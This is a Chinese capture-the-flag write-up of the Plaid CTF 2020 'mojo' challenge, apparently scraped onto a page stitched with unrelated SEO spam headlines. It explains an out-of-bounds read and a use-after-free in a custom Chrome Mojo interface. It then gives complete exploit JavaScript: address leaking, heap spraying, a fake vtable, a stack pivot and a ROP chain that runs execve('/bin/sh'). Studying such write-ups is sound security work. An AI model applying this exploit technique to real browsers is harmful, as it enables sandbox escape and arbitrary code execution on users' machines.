当前位置: 首页 > news >正文

金湖网站推广scatter网站开发

金湖网站推广,scatter网站开发,wordpress目录seo,怎样做关键词网站文章目录 前置知识参考文章环境搭建题目环境调试环境 题目分析附件分析漏洞分析OOBUAF 漏洞利用总结 前置知识 Mojo Services 简介 chromium mojo 快速入门 Mojo docs Intro to Mojo Services 译文#xff1a;利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸原文… 文章目录 前置知识参考文章环境搭建题目环境调试环境 题目分析附件分析漏洞分析OOBUAF 漏洞利用总结 前置知识 Mojo Services 简介 chromium mojo 快速入门 Mojo docs Intro to Mojo Services 译文利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸原文Cleanly Escaping the Chrome Sandbox 参考文章 本文主要参考 Plaid CTF 2020 mojo Writeup 环境搭建 题目环境 给了 docker 环境所以直接启 docker 即可。 安装 docker sudo snap install docker运行 run.sh 脚本 ./run.sh运行 chrome ./chrome --disable-gpu --remote-debugging-port1338 --enable-blink-featuresMojoJS,MojoJSTest url调试环境 这里单独启一个 web 服务 python3 -m http.server 8000调试脚本 # gdbinit # 读取符号 file ./chrome # 设置启动参数 set args --disable-gpu --remote-debugging-port1338 --user-data-dir./userdata --enable-blink-featuresMojoJS url # 设置执行fork后继续调试父进程 set follow-fork-mode parent然后 gdb 调试即可 gdb -x gdbinit题目分析 附件分析 题目新定义了一个 PlaidStore 接口 module blink.mojom;// This interface provides a data store interface PlaidStore {// Stores data in the data storeStoreData(string key, arrayuint8 data);// Gets data from the data storeGetData(string key, uint32 count) (arrayuint8 data); };该接口定义了两个方法 StoreData、GetData 分别用于向 data store 中存储数据和获取数据。 然后在浏览器端实现 PlaidStore 接口 namespace content {class RenderFrameHost;class PlaidStoreImpl : public blink::mojom::PlaidStore {public:explicit PlaidStoreImpl(RenderFrameHost *render_frame_host);static void Create(RenderFrameHost* render_frame_host,mojo::PendingReceiverblink::mojom::PlaidStore receiver);~PlaidStoreImpl() override;// PlaidStore overrides:void StoreData(const std::string key,const std::vectoruint8_t data) override;void GetData(const std::string key,uint32_t count,GetDataCallback callback) override;private:RenderFrameHost* render_frame_host_;std::mapstd::string, std::vectoruint8_t data_store_; };}可以看到这里存在两个私有变量其中一个是 data_store_这个好理解其就是用来存储数据的这里的 render_frame_host_ 是神马东西呢 render 进程中的每一个 frame 都在 browser 进程中对应一个 RenderFrameHost很多由浏览器提供的 mojo 接口就是通过 RenderFrameHoset 获取的。在 RenderFrameHost 初始化阶段会在 BinderMap 中填充所有公开的 mojo 接口 -660,6 662,10 void PopulateFrameBinders(RenderFrameHostImpl* host,map-Addblink::mojom::SerialService(base::BindRepeating(RenderFrameHostImpl::BindSerialService, base::Unretained(host)));#endif // !defined(OS_ANDROID)map-Addblink::mojom::PlaidStore(base::BindRepeating(RenderFrameHostImpl::CreatePlaidStore,base::Unretained(host)));}当一个 render frame 请求该接口时在 BinderMap 中关联的回调函数 RenderFrameHostImpl::CreatePlaidStore 就会被调用其定义如下 void RenderFrameHostImpl::CreatePlaidStore(mojo::PendingReceiverblink::mojom::PlaidStore receiver) {PlaidStoreImpl::Create(this, std::move(receiver)); }其直接调用了 PlaidStoreImpl::Create 函数 // static void PlaidStoreImpl::Create(RenderFrameHost *render_frame_host,mojo::PendingReceiverblink::mojom::PlaidStore receiver) {mojo::MakeSelfOwnedReceiver(std::make_uniquePlaidStoreImpl(render_frame_host),std::move(receiver)); }通过该函数一个 PlaidStoreImpl 就被创建并且该 PendingReceiver 与一个 SelfOwnedReceiver 绑定。 漏洞分析 该题存在两个漏洞分别是 OOB 与 UAF接下来直接分别讲解。 OOB 来分析下存取数据的操作 void PlaidStoreImpl::StoreData(const std::string key,const std::vectoruint8_t data) {if (!render_frame_host_-IsRenderFrameLive()) {return;}data_store_[key] data; }void PlaidStoreImpl::GetData(const std::string key,uint32_t count,GetDataCallback callback) {if (!render_frame_host_-IsRenderFrameLive()) {std::move(callback).Run({});return;}auto it data_store_.find(key);if (it data_store_.end()) {std::move(callback).Run({});return;}std::vectoruint8_t result(it-second.begin(), it-second.begin() count);std::move(callback).Run(result); }可以看到两个操作都会先调用 render_frame_host_-IsRenderFrameLive 去检查 render frame 是否处于 live 状态。然后 StoreData 没啥问题主要在于 GetData 函数没有对 count 字段做检查所以这里可以导致越界读。 UAF 这里主要涉及到对象指针生命周期的问题。 在上面我们说过当一个 render frame 请求该接口时在 BinderMap 中关联的回调函数 RenderFrameHostImpl::CreatePlaidStore 就会被调用其最后会调用到 PlaidStoreImpl::Create 函数 void PlaidStoreImpl::Create(RenderFrameHost *render_frame_host,mojo::PendingReceiverblink::mojom::PlaidStore receiver) {mojo::MakeSelfOwnedReceiver(std::make_uniquePlaidStoreImpl(render_frame_host),std::move(receiver)); }通过该函数一个 PlaidStoreImpl 就被创建并且该 PendingReceiver 与一个 SelfOwnedReceiver 绑定也就是说这里会将消息管道的一段 receiver 与 PlaidStoreImpl 绑定而这里传入的 render_frame_host 是一个 PlaidStoreImpl 类型的智能指针。 由于这里的绑定所以当 mojo 管道关闭或发生错误时PlaidStoreImpl 就会被自动释放从而使得 PlaidStoreImpl 与 receiver 的生命周期保持一致这其实是不存在问题的。 而在 PlaidStoreImpl 的构造函数中存在对 render_frame_host 的赋值操作 PlaidStoreImpl::PlaidStoreImpl(RenderFrameHost *render_frame_host): render_frame_host_(render_frame_host) {}可以看到在 PlaidStoreImpl 的构造函数中将 render_frame_host 赋给了其私有属性 render_frame_host_。那么问题就来了如果 render_frame_host 对象被析构了比如删除 iframe但是 PlaidStoreImpl 还存在因为 render_frame_host 并没有与 PlaidStoreImpl 绑定那么在 StoreData/GetData 中调用 render_frame_host_-IsRenderFrameLive() 就会存在 UAF 漏洞。 漏洞利用 整体是思路就比较明确了 利用 OOB 泄漏相关数据利用 UAF 劫持程序执行流 前期准备 调用 MojoJS 接口时请包含以下 JS 文件这里请根据具体题目路径进行包含 script srcmojo/public/js/mojo_bindings.js/script script srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js/script然后进行管道端点绑定 // 方案一 var ps blink.mojom.PlaidStore.getRemote(true); // 方案二 var ps new blink.mojom.PlaidStorePtr(); // 获取 PlaidStore 实例 var name blink.mojom.PlaidStore.name; // 获取 InterfaceName var rq mojo.makeRequest(ps); Mojo.bindInterface(name, re.handle, context, true);调试分析 OOB 泄漏数据 首先是测试 OOB主要是看下能够泄漏什么数据 htmlscript srcmojo/public/js/mojo_bindings.js/scriptscript srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js/scriptscriptfunction hexx(str, v) {console.log(\033[32m[] str \033[0m0x v.toString(16));}async function pwn() {console.log(PWN);//var ps blink.mojom.PlaidStore.getRemote(true); // 这种方式断点断不下来var ps new blink.mojom.PlaidStorePtr();Mojo.bindInterface(blink.mojom.PlaidStore.name,mojo.makeRequest(ps).handle,context, true);await(ps.storeData(pwn, new Uint8Array(0x10).fill(0x41)));var leak_data (await(ps.getData(pwn, 0x20))).data;var u8 new Uint8Array(leak_data);var u64 new BigInt64Array(u8.buffer);}pwn();/script /html将断点打在 PlaidStoreImpl::Create 函数上主要就是看下 PlaidStoreImpl 申请的空间 可以看到这里 PlaidStoreImpl 的空间大小为 0x28其成员依次往下为 vtable、render_frame_host、data_store_ 当 StoreData 执行完后 可以看到这里 PlaidStoreImpl、data_store_、data_vector 位于同一个段所以这里可以通过越界读泄漏 PlaidStoreImpl 的 vtable 地址并且还可以泄漏 render_frame_host_ 的地址然后通过这些地址泄漏其它地址。比如可以通过 vtable 的地址确定 ELF 加载基地址 泄漏了 ELF 基地址后就可以得到很多有用的 gadget 了。 UAF 劫持程序执行流 有了 gadget 后接下来就是考虑如何劫持 rip这里的想法就是劫持虚表指针从而劫持程序执行流。 我们知道每次调用 StoreData/GetData 时都会先调用 render_frame_host_-IsRenderFrameLive其是通过虚表指针进行调用的 可以看到这里的 rax 就是 render_frame_host_ 的虚表地址然后 [rax 0x160] 就是 IsRenderFrameLive 函数的地址。 可以简单验证一下可以看到当执行 call QWORD PTR[rax0x160] 时rax 确实是 render_frame_host_ 的虚表地址 那么整个思路就比较清晰了 构造 render_frame_host_ UAF堆喷获取 UAF 堆块并伪造 render_frame_host_ 虚表调用 render_frame_host_-IsRenderFrameLive 控制程序执行流 这里 rax 寄存器的值就是 render_frame_host_ 的虚表地址而其虚表地址我们是可控的就在 render_frame_host_ 对象的头 8 字节处而在 OOB 中我们又可以顺带泄漏 render_frame_host_ 的地址其就在 PlaidStoreImpl 虚表的下方所以我们可以利用 xchg rax, rsp 等 gadget 劫持栈到 render_frame_host_ 上并提前在 render_frame_host_ 上布置好 rop chain 即可。 这里借用上述参考文章中佬的一张图 在布局 gadget 前还有一个问题我们该如何在释放 render_frame_host_ 所指向的内存之后再将这块内存分配回来这里有个小知识点chrome 中的内存管理使用的是 TCMalloc 机制。又因为 StoreData 函数分配的vectoruint8_t 与 render_frame_host_ 使用的是同一个分配器只要大量分配大小与 RenderFrameHostImpl 相等的vector就有可能占位成功。 TCMallocThread-Caching Malloc实现了高效的多线程内存管理用于替代系统的内存分配相关的函数 TCMalloc解密 所以我们现在得需要知道 RenderFrameHostImpl 的大小。将断点打在其构造函数 RenderFrameHostImpl::RenderFrameHostImpl 上 可以看到在执行构造函数前执行了 RenderFrameFactory::Create 函数所以其多半就是为 RenderFrameHostImpl 分配空间的函数重新将断点打在 RenderFrameHostFactory::Create 上 所以这里多半就可以确认 RenderFrameHostImpl 的大小为 0xc28。 这里照搬上述参考文章也是比较重要的部分 当我们创建一个 child iframe 并建立一个 PlaidStoreImpl 实例后。如果我们关闭这个 child iframe则对应的RenderFrameHost 将会自动关闭但与此同时child iframe 所对应的 PlaidStoreImpl 与 browser 建立的 mojo 管道将会被断开。而该管道一但断开则 PlaidStoreImpl 实例将会被析构。 因此我们需要在关闭 child iframe 之前将管道的 remote 端移交给 parent iframe使得 child iframe 的 PlaidStoreImpl 实例在 iframe 关闭后仍然存活。 回想一下正常情况下当关闭一个 iframe 时RenderFrameHost 将会被析构、mojo 管道将会被关闭。此时 Mojo 管道的关闭一定会带动 PlaidStoreImpl 的析构这样就可以析构掉所有该析构的对象。 但这里却没有因为在关闭 child iframe 前已经将该 iframe 所持有的 Mojo 管道 Remote 端移交出去了因此在关闭 child iframe 时将不会关闭 Mojo 管道。而 PlaidStoreImpl 的生命周期并没有与 RenderFrameHost 相关联。即 RenderFrameHost 的析构完全不影响 PlaidStoreImpl 实例的生命周期。所以PlaidStoreImpl 实例将不会被析构。 那么问题是该如何移交 Mojo 管道的 remote 端呢答案是使用 MojoInterfaceInterceptor。该功能可以拦截来自同一进程中其他 iframe 的 Mojo.bindInterface 调用。在 child iframe 被销毁前我们可以利用该功能将mojo 管道的一端传递给 parent iframe。 以下是来自其他 exp 的相关代码我们可以通过该代码片段来了解 MojoInterfaceInterceptor 的具体使用方式 var kPwnInterfaceName pwn;// runs in the child frame function sendPtr() {var pipe Mojo.createMessagePipe();// bind the InstalledAppProvider with the child rfhMojo.bindInterface(blink.mojom.InstalledAppProvider.name,pipe.handle1, context, true);// pass the endpoint handle to the parent frameMojo.bindInterface(kPwnInterfaceName, pipe.handle0, process); }// runs in the parent frame function getFreedPtr() {return new Promise(function (resolve, reject) {var frame allocateRFH(window.location.href #child); // designate the child by hash// intercept bindInterface calls for this process to accept the handle from the childlet interceptor new MojoInterfaceInterceptor(kPwnInterfaceName, process);interceptor.oninterfacerequest function(e) {interceptor.stop();// bind and return the remotevar provider_ptr new blink.mojom.InstalledAppProviderPtr(e.handle);freeRFH(frame);resolve(provider_ptr);}interceptor.start();}); }现在我们已经解决了所有潜在的问题UAF 的利用方式应该是这样的 将 child iframe 中 Mojo 管道的 remote 端移交至 parent iframe使得 Mojo 管道仍然保持连接释放 child iframe多次分配内存使得分配到原先被释放 RenderFrameHostImpl 的内存区域写入目标数据执行 child iframe 对应的 PlaidStoreImpl::GetData 函数 不过需要注意的是在该题中并不需要将 child iframe 的 Mojo 管道一端传递给 parent iframe 的操作。因为通过调试可知child iframe 在 remove 后其所对应的 PlaidStoreImpl 实例仍然存在并没有随着 Mojo pipe 的关闭而被析构 尚未明确具体原因但这种情况却简化了漏洞利用的方式 最后简化后的利用方式如下 释放 child iframe多次分配内存使得分配到原先被释放 RenderFrameHostImpl 的内存区域写入目标数据执行 child iframe 对应的 PlaidStoreImpl::GetData 函数 简单测试一下 html headscript srcmojo/public/js/mojo_bindings.js/scriptscript srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js/scriptscriptasync function pwn() {var frame document.createElement(iframe);frame.srcdoc script srcmojo/public/js/mojo_bindings.js\/scriptscript srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js\/scriptscriptvar ps new blink.mojom.PlaidStorePtr();Mojo.bindInterface(blink.mojom.PlaidStore.name,mojo.makeRequest(ps).handle,context,true);ps.storeData(pwn, new Uint8Array(0x20).fill(0x41));window.ps ps;\/script;document.body.appendChild(frame);frame.contentWindow.addEventListener(DOMContentLoaded, async () {var ps frame.contentWindow.ps;if(ps undefined || ps 0) {throw FAILED to load iframe;}var raw_buf new ArrayBuffer(0xc28);var fu8 new Uint8Array(raw_buf).fill(0);var fu64 new BigUint64Array(raw_buf);fu64[0] 0xdeadbeefn;var pps new blink.mojom.PlaidStorePtr();Mojo.bindInterface(blink.mojom.PlaidStore.name,mojo.makeRequest(pps).handle,context,true);document.body.removeChild(frame);frame.remove();for (let i 0; i 100; i) {await pps.storeData(pwn i, fu8);}await ps.getData(pwn, 0);});}/script /head body onload pwn()/body/html效果如下 程序在 GetData 中 Crash此时的 rax 0xdeadbeef符合预期。 最后的 exp 如下 html headscript srcmojo/public/js/mojo_bindings.js/scriptscript srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js/scriptscriptfunction hexx(str, v) {var elem document.getElementById(#parentLog);if(elem undefined) {elem document.createElement(div);document.body.appendChild(elem);}elem.innerText [] str : 0x v.toString(16) \n;}async function pwn() {//var ps blink.mojom.PlaidStore.getRemote(true);var frame document.createElement(iframe);frame.srcdoc script srcmojo/public/js/mojo_bindings.js\/scriptscript srcthird_party/blink/public/mojom/plaidstore/plaidstore.mojom.js\/scriptscriptasync function pwn() {var ps_list [];for (let i 0; i 0x200; i) {let ps new blink.mojom.PlaidStorePtr();Mojo.bindInterface(blink.mojom.PlaidStore.name,mojo.makeRequest(ps).handle,context, true);await ps.storeData(pwn, new Uint8Array(0x20).fill(0x41));ps_list.push(ps);}var elf_to_vtable 0x9fb67a0n;var vtable_addr -1;var render_frame_host_addr -1;for (let k 0; k 0x200; k) {let ps ps_list[k];let leak_data (await ps.getData(pwn, 0x200)).data;let u8 new Uint8Array(leak_data);let u64 new BigInt64Array(u8.buffer);for (let i 0x20 / 8; i u64.length - 1; i) {if ((u64[i] 0xfffn) 0x7a0n (u64[i] 0xf00000000000n) 0x500000000000n) {vtable_addr u64[i];render_frame_host_addr u64[i1];break;}if (vtable_addr ! -1) {break;}}}if (vtable_addr -1) {hexx(FAILED to OOB vtable addr, -1);throw [X] FAILED to OOB vtable addr;}var elf_base vtable_addr - elf_to_vtable;window.ps ps_list[0];window.elf_base elf_base;window.render_frame_host_addr render_frame_host_addr;}\/script;document.body.appendChild(frame);frame.contentWindow.addEventListener(DOMContentLoaded, async () {await frame.contentWindow.pwn();var ps frame.contentWindow.ps;var elf_base frame.contentWindow.elf_base;var render_frame_host_addr frame.contentWindow.render_frame_host_addr;if (ps undefined || ps 0) {throw FAILED to load iframe;}var pop_rdi elf_base 0x0000000002e4630fn;var pop_rsi elf_base 0x0000000002d278d2n;var pop_rdx elf_base 0x0000000002e9998en;var pop_rax elf_base 0x0000000002e651ddn;var syscall elf_base 0x0000000002ef528dn;var xchg_rax_rsp elf_base 0x000000000880dee8n; // xchg rax, rsp ; clc ; pop rbp ; rethexx(elf_base, elf_base);hexx(render_frame_host_addr, render_frame_host_addr);hexx(pop_rdi, pop_rdi);hexx(pop_rsi, pop_rsi);hexx(pop_rdx, pop_rdx);hexx(pop_rax, pop_rax);hexx(syscall, syscall);hexx(xchg_rax_rsp, xchg_rax_rsp);const RenderFrameHostSize 0xc28;var raw_buf new ArrayBuffer(RenderFrameHostSize);var fu8 new Uint8Array(raw_buf).fill(0);var fdv new DataView(raw_buf);var rop new BigUint64Array(raw_buf, 0x10);fdv.setBigInt64(0, render_frame_host_addr0x10n, true);fdv.setBigInt64(0x100x160, xchg_rax_rsp, true);fdv.setBigInt64(0x100x1600x8, 0x68732f6e69622fn, true);rop[0] 0xdeadbeefn; // rbprop[1] pop_rdi;rop[2] render_frame_host_addr0x178n;rop[3] pop_rsi;rop[4] 0n;rop[5] pop_rdx;rop[6] 0n;rop[7] pop_rax;rop[8] 59n;rop[9] syscall;var pps new blink.mojom.PlaidStorePtr();Mojo.bindInterface(blink.mojom.PlaidStore.name,mojo.makeRequest(pps).handle,context, true);document.body.removeChild(frame);frame.remove();for (let i 0; i 100; i) {await pps.storeData(pwni, fu8);}await ps.getData(pwn, 0x20);});}/script /head body onload pwn()/body /html效果如下 总结 这个题目算是比较简单的沙箱逃逸了但是还是搞了两天。主要的问题就是调试比较奇怪的是如果 exp 中出现了一些错误程序不会报错。比如我的 exp 最开始在赋值 BigInt 类型的数字时忘记给 0 后面加上 n然后 exp 就一直打不通但是程序也不报错所以这里发现这个 0n 问题我就搞了一天…
http://www.dnsts.com.cn/news/50174.html

相关文章:

  • 苏州建设网站房地产活动策划网站
  • 定制企业网站费用9免费网站空间
  • 织梦做商城网站c 做网站的六大对象
  • 湖南seo优化排名抚顺seo
  • 如何降低网站相似度阳泉网站建设公司
  • 丹东商城网站建设深圳附近推广
  • 上海好的网站设计公司有哪些设计制作一个保温杯ppt
  • 网站建设dede域名有了主机有了如何做网站
  • 几种语言的网站如何做养生网站策划
  • 手机网站底部悬浮菜单个人网站做捐赠发布违法吗
  • 网站毕设Wordpress怎么做导航页
  • 无锡做网站哪里好wordpress附件下载失败
  • 动漫设计与制作专业的学校有哪些seo网站介绍
  • 网站建设标志图广州现在算什么风险地区
  • 五金制品东莞网站建设技术支持微信公众号可以做网站嘛
  • 今晚8时兰州全面解封外贸seo
  • dw建设网站flash手机网站制作
  • 建站节住房和城乡建设部网站 事故
  • 建设个人网站详细点重新安装 wordpress
  • 单位门户网站建设存在问题网站建设说明
  • 手机企业网站房地产最新消息新闻
  • 卖东西的网站怎么建设南昌seo方案
  • 东莞外贸网站搭建制作网站建设的运营计划
  • 做平台网站要增值业务吗垂直 社交网站 建设
  • 老河口网站深圳骏域网站建设专家
  • 郑州高新区做网站的公司做网站开发app
  • 拖拽式wordpress建站计算机专业培训机构排名
  • 单页网站的区别网站建设公司网站建设专业品牌
  • 本科毕业 做网站编辑wordpress仿微信音乐插件
  • 中国搜索网站提交入口如何策划电子商务的网站建设